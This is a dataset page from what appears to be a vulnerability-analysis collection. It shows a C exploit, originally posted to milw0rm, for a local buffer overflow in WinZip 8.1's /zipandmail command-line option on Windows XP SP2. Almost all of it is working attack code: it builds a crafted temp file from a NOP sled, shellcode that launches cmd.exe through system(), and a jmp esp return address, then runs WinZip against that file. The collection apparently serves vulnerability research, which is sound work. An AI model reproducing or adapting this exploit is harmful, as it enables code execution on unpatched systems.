lilbool
/

vuln-code-analysis

Model card Files Files and versions

vuln-code-analysis / exploit-analyzer /exploits /exploit_1034.txt

lilbool's picture

Upload 212 files

497f2f3 verified over 1 year ago

history blame contribute delete

2.27 kB

	/*
	*
	* WinZip Command Line Local Buffer Overflow
	* http://securitytracker.com/alerts/2004/Sep/1011132.html
	* http://www.winzip.com/wz90sr1.htm
	* Exploit coded By ATmaCA
	* Web: atmacasoft.com && spyinstructors.com
	* E-Mail: atmaca@icqmail.com
	* Credit to kozan
	*
	*/

	/*
	*
	* Tested with WinZip 8.1 on Win XP Sp2 En
	* Bug Fixed on WinZip 9.0 Service Release 1 (SR-1)
	* http://www.winzip.com/wz90sr1.htm
	*
	*/

	#include <windows.h>
	#include <stdio.h>

	#define NOP 0x90

	void main()
	{
	// create crafted command line
	char tmpfile[] = "c:\\wzs45.tmp";
	char winzippath[] = "C:\\Program Files\\WINZIP\\winzip32.exe";
	char zipandmailpar[] = " -* /zipandmail /@ ";
	char runpar[300];
	int i = 0;
	strcpy(runpar,winzippath);
	strcat(runpar,zipandmailpar);
	strcat(runpar,tmpfile);

	// need for some input file name .tmp but not must to exist
	char inputfile[] = "C:\\someinputfile.ext\n";

	// launch a local cmd.exe
	char shellcode[] =
	"\x55\x8B\xEC\x33\xFF"
	"\x57\x83\xEC\x04\xC6\x45\xF8"
	"\x63\xC6\x45\xF9\x6D\xC6\x45"
	"\xFA\x64\xC6\x45\xFB\x2E\xC6"
	"\x45\xFC\x65\xC6\x45\xFD\x78"
	"\xC6\x45\xFE\x65\xB8"
	"\xC7\x93\xC2\x77" //77C293C7 system() - WinXP SP2 - msvcrt.dll
	"\x50\x8D\x45\xF8\x50"
	"\xFF\x55\xF4";

	// create crafted .tmp file
	FILE *di;
	if( (di=fopen(tmpfile,"wb")) == NULL ){
	return;
	}

	for(i=0;i<sizeof(inputfile)-1;i++)
	fputc(inputfile[i],di);

	fprintf(di,"c:\\");

	for(i=0;i<384;i++)
	fputc(NOP,di);


	for(i=0;i<sizeof(shellcode)-1;i++)
	fputc(shellcode[i],di);

	fprintf(di,"\xBF\xAC\xDA\x77"); //EIP - WinXp Sp2 Eng - jmp esp addr
	fprintf(di,"\x90\x90\x90\x90"); //NOPs
	fprintf(di,"\x90\x83\xEC\x74"); //sub esp,0x74
	fprintf(di,"\xFF\xE4\x90\x90"); //jmp esp

	fprintf(di,"\n");

	fclose(di);
	WinExec(runpar,SW_SHOW);
	}

	// milw0rm.com [2005-06-07]